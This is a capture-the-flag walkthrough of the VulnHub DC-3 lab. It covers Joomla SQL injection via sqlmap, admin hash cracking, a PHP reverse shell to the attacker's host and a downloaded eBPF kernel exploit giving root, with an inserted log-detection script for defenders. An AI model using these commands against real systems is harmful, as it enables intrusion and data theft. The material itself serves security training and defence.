I Love Doing Boot2Root Boxes: DC-3

Download: https://www.vulnhub.com/entry/dc-3,312/

Host discovery

Port scan: only port 80 is open. With the -A option we can also see that the site's CMS is Joomla.

Visit port 80

Directory scan: the site's admin backend is found.

Using nikto: nikto -host 192.168.44.144

Using dirsearch:

python3 dirsearch.py -u http://192.168.44.144 -e php

Using joomscan, the Joomla-specific vulnerability scanner, to get the exact Joomla version:

git clone https://github.com/rezasp/joomscan.git

cd joomscan

perl joomscan.pl 192.168.44.144

Use searchsploit to look up known vulnerabilities in Joomla 3.7.0:

searchsploit joomla 3.7.0

Read the entry

Following the path given, read the file: this CMS version has a SQL injection vulnerability, CVE-2017-8917.

Fire up sqlmap and start injecting.

Enumerate databases:

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"

Enumerate tables:

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

Enumerate columns:

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns

Dump the contents:

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump

Username: admin

Password: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

Crack the hash with John on Kali; the backend login password is snoopy.

Log into the admin backend found earlier: http://192.168.44.144/administrator/

Poking around in the backend, I found a place where the site's templates can be edited; you can create a new PHP file there directly and get a reverse shell.

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>

Start a listener on Kali: nc -lvvp 8080

Browse to the reverse-shell file. I got stuck on the path here for a while: combining the templates directory from the earlier directory scan with the template name beez3, and remembering that Linux is case-sensitive, it took some time to find the correct path and access it.

At this point Kali has received the shell.
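From the defender's side, the web phase above (the CVE-2017-8917 probe through list[fullordering] on com_fields, the template edit in the admin backend, and the direct request to a PHP file under /templates/) leaves clear traces in the web server's access log. The following is an added example, not part of the original writeup: detection logic run over constructed Apache combined-format log lines. The addresses, timestamps, the template id and the shell filename are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines (not from the original writeup).
# Addresses, timestamps, the template id and the shell filename are assumptions.
SAMPLE_LOG = """\
192.168.44.142 - - [09/Apr/2020:23:10:01 +0800] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.44.142 - - [09/Apr/2020:23:10:03 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering%20ASC HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
192.168.44.142 - - [09/Apr/2020:23:10:05 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 812 "-" "Mozilla/5.0"
192.168.44.142 - - [09/Apr/2020:23:10:06 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(1,concat(0x3a,version()),1) HTTP/1.1" 500 812 "-" "sqlmap/1.4"
192.168.44.142 - - [09/Apr/2020:23:20:30 +0800] "POST /administrator/index.php?option=com_templates&view=template&id=506 HTTP/1.1" 303 0 "-" "Mozilla/5.0"
192.168.44.142 - - [09/Apr/2020:23:21:00 +0800] "GET /templates/beez3/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# A legitimate fullordering value has the shape "<column> ASC|DESC"; anything else is a probe.
ORDERING_OK = re.compile(r"^[A-Za-z0-9_.]+ (ASC|DESC)$", re.I)

def classify(line):
    """Return the list of findings for one access-log line (empty if benign or unparseable)."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return []
    url = urlsplit(m["path"])
    params = {k: v[0] for k, v in parse_qs(url.query).items()}  # parse_qs decodes %5B/%5D
    findings = []
    ordering = params.get("list[fullordering]")
    if params.get("option") == "com_fields" and ordering is not None and not ORDERING_OK.match(ordering):
        findings.append(f"CVE-2017-8917 pattern: list[fullordering]={ordering}")
    if m["method"] == "POST" and url.path.startswith("/administrator/") and params.get("option") == "com_templates":
        findings.append("template edited through the admin backend (review template files on disk)")
    if url.path.startswith("/templates/") and url.path.endswith(".php"):
        findings.append(f"direct request to a PHP file under /templates/: {url.path}")
    if "sqlmap" in m["ua"].lower():
        findings.append("sqlmap user-agent")
    return findings

def scan(log_text):
    """Scan a whole log; returns [(ip, timestamp, finding), ...] in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits.extend((m["ip"], m["ts"], f) for f in classify(line))
    return hits

if __name__ == "__main__":
    for ip, ts, finding in scan(SAMPLE_LOG):
        print(ts, ip, finding)
```

Template files are normally only included by index.php, so a direct hit on a .php file under /templates/ shortly after a com_templates POST is the sequence worth alerting on.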

The privileges are low, so first try SUID privilege escalation. The following commands list the SUID executables on the system:

  1. find / -perm -u=s -type f 2>/dev/null

  2. find / -user root -perm -4000 -print 2>/dev/null

  3. find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Linux binaries known to be usable for privilege escalation: nmap, vim, find, bash, more, less, nano, cp

No exploitable file was found.

Try kernel privilege escalation

Check the Linux version

Use searchsploit to look for an exploitable vulnerability

Following the path, view the exploit details: cat /usr/share/exploitdb/exploits/linux/local/39772.txt

It gives the exploit download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Find a directory with execute permission

Switch to the tmp folder and download the exploit referenced by searchsploit:

Switch: cd tmp

Download: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Unzip: unzip 39772.zip

Extract again: tar -xvf exploit.tar

Switch: cd ebpf_mapfd_doubleput_exploit/

Run: ./compile.sh

Run: ./doubleput

Then we have root.

www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<ploitdb-bin-sploits/raw/master/bin-sploits/39772.zip                                                                                                                
--2020-04-09 23:27:16--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip                                                
Resolving github.com (github.com)... 13.250.177.223                                                                                                                  
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

     0K ......                                                100% 4.44M=0.002s

2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh                      
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput                       
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...

bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ 